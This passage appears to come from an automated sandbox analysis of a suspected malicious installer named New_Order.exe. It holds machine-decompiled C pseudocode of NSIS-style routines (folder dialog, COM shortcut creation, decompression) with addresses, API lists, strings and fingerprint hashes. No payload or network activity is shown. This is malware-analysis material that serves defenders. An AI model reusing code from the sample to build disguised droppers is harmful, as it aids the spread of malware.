					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
						E00405A8F(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040417B(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040417B(_t166);
					E004041B0(_t165);
					_t138 = E00406500(8);
					if(_t138 == 0) {
						L53:
						return E004041E2(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                        0x0040460d
                                                                        0x00404613
                                                                        0x00404619
                                                                        0x00404626
                                                                        0x00404634
                                                                        0x00404637
                                                                        0x0040463f
                                                                        0x00404645
                                                                        0x00404645
                                                                        0x00404651
                                                                        0x00404654
                                                                        0x004046c2
                                                                        0x004046c9
                                                                        0x004047a0
                                                                        0x004047a7
                                                                        0x004047b6
                                                                        0x004047b6
                                                                        0x004047ba
                                                                        0x004047c4
                                                                        0x004047d1
                                                                        0x004047d3
                                                                        0x004047d3
                                                                        0x004047e1
                                                                        0x004047e8
                                                                        0x004047ef
                                                                        0x004047f2
                                                                        0x00404829
                                                                        0x0040482b
                                                                        0x00404831
                                                                        0x00404836
                                                                        0x0040483a
                                                                        0x0040483c
                                                                        0x0040483c
                                                                        0x00404858
                                                                        0x00000000
                                                                        0x0040485a
                                                                        0x0040485d
                                                                        0x0040486b
                                                                        0x00404871
                                                                        0x00404872
                                                                        0x00404875
                                                                        0x00404878
                                                                        0x00000000
                                                                        0x00404878
                                                                        0x004047f4
                                                                        0x004047f6
                                                                        0x004047fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004047fc
                                                                        0x004047fc
                                                                        0x00404809
                                                                        0x0040480e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404812
                                                                        0x00404814
                                                                        0x00404814
                                                                        0x0040481c
                                                                        0x0040481e
                                                                        0x00404821
                                                                        0x00404824
                                                                        0x00404827
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404827
                                                                        0x00404884
                                                                        0x0040488e
                                                                        0x00404891
                                                                        0x00404894
                                                                        0x0040489b
                                                                        0x0040489b
                                                                        0x0040489d
                                                                        0x0040489d
                                                                        0x004048a2
                                                                        0x004048a4
                                                                        0x004048ac
                                                                        0x004048b3
                                                                        0x004048b5
                                                                        0x004048c0
                                                                        0x004048c0
                                                                        0x004048b5
                                                                        0x004048c7
                                                                        0x004048d0
                                                                        0x004048da
                                                                        0x004048e2
                                                                        0x004048fd
                                                                        0x004048e4
                                                                        0x004048ed
                                                                        0x004048ed
                                                                        0x004048e2
                                                                        0x00404902
                                                                        0x00404907
                                                                        0x0040490c
                                                                        0x00404915
                                                                        0x00404915
                                                                        0x0040491e
                                                                        0x00404920
                                                                        0x00404920
                                                                        0x0040492c
                                                                        0x00404934
                                                                        0x0040493e
                                                                        0x0040493e
                                                                        0x00404943
                                                                        0x00000000
                                                                        0x00404943
                                                                        0x004047f2
                                                                        0x004047a9
                                                                        0x004047b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004047b0
                                                                        0x004046cf
                                                                        0x004046d8
                                                                        0x004046f2
                                                                        0x004046f7
                                                                        0x00404701
                                                                        0x00404708
                                                                        0x00404714
                                                                        0x00404717
                                                                        0x0040471a
                                                                        0x00404721
                                                                        0x00404729
                                                                        0x0040472c
                                                                        0x00404730
                                                                        0x00404737
                                                                        0x0040473f
                                                                        0x00404799
                                                                        0x00404741
                                                                        0x00404742
                                                                        0x00404749
                                                                        0x00404753
                                                                        0x0040475b
                                                                        0x00404768
                                                                        0x0040477c
                                                                        0x00404780
                                                                        0x00404780
                                                                        0x0040477c
                                                                        0x00404785
                                                                        0x00404792
                                                                        0x00404792
                                                                        0x0040473f
                                                                        0x00000000
                                                                        0x004046f7
                                                                        0x004046e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004046eb
                                                                        0x00000000
                                                                        0x00404656
                                                                        0x00404663
                                                                        0x0040466c
                                                                        0x00404679
                                                                        0x00404679
                                                                        0x00404680
                                                                        0x00404686
                                                                        0x0040468f
                                                                        0x00404692
                                                                        0x00404695
                                                                        0x0040469d
                                                                        0x004046a0
                                                                        0x004046a3
                                                                        0x004046a9
                                                                        0x004046b0
                                                                        0x004046b7
                                                                        0x00404949
                                                                        0x0040495b
                                                                        0x004046bd
                                                                        0x004046c0
                                                                        0x00000000
                                                                        0x004046c0
                                                                        0x004046b7

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 0040465C
                                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                        • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                        • lstrcmpiA.KERNEL32(GHFGHFGHFDGDFGDFg,0042A890,00000000,?,?), ref: 00404774
                                                                        • lstrcatA.KERNEL32(?,GHFGHFGHFDGDFGDFg), ref: 00404780
                                                                        • SetDlgItemTextA.USER32 ref: 00404792
                                                                          • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\New_Order.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\New_Order.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                          • Part of subcall function 004063D2: CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                        • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                          • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                          • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                          • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp$GHFGHFGHFDGDFGDFg
                                                                        • API String ID: 2624150263-1489735066
                                                                        • Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                        • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                        • Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                        • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E0040216B() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AFC( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                        0x00402174
                                                                        0x0040217e
                                                                        0x00402188
                                                                        0x00402195
                                                                        0x004021a0
                                                                        0x004021a3
                                                                        0x004021bd
                                                                        0x004021c3
                                                                        0x004021c9
                                                                        0x004021cc
                                                                        0x004021d6
                                                                        0x004021da
                                                                        0x004021da
                                                                        0x004021df
                                                                        0x004021f0
                                                                        0x004021f8
                                                                        0x004022d4
                                                                        0x004022d4
                                                                        0x004022db
                                                                        0x004021fe
                                                                        0x004021fe
                                                                        0x0040220d
                                                                        0x00402211
                                                                        0x00402214
                                                                        0x0040221a
                                                                        0x00402228
                                                                        0x0040222b
                                                                        0x0040222d
                                                                        0x00402238
                                                                        0x00402238
                                                                        0x0040223d
                                                                        0x0040223f
                                                                        0x00402246
                                                                        0x00402246
                                                                        0x00402249
                                                                        0x00402252
                                                                        0x00402255
                                                                        0x0040225a
                                                                        0x0040225c
                                                                        0x00402269
                                                                        0x00402269
                                                                        0x0040226c
                                                                        0x00402278
                                                                        0x0040227b
                                                                        0x00402284
                                                                        0x0040228a
                                                                        0x00402291
                                                                        0x004022aa
                                                                        0x004022ac
                                                                        0x004022ba
                                                                        0x004022ba
                                                                        0x004022aa
                                                                        0x004022bd
                                                                        0x004022c3
                                                                        0x004022c3
                                                                        0x004022c6
                                                                        0x004022cc
                                                                        0x004022d2
                                                                        0x004022e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004022d2
                                                                        0x004022dd
                                                                        0x00402a5d
                                                                        0x00402a69

                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 123533781-1943935188
                                                                        • Opcode ID: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                                        • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                        • Opcode Fuzzy Hash: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                                        • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406945, Relevance: .3, Instructions: 334COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E00406945(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004070B4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
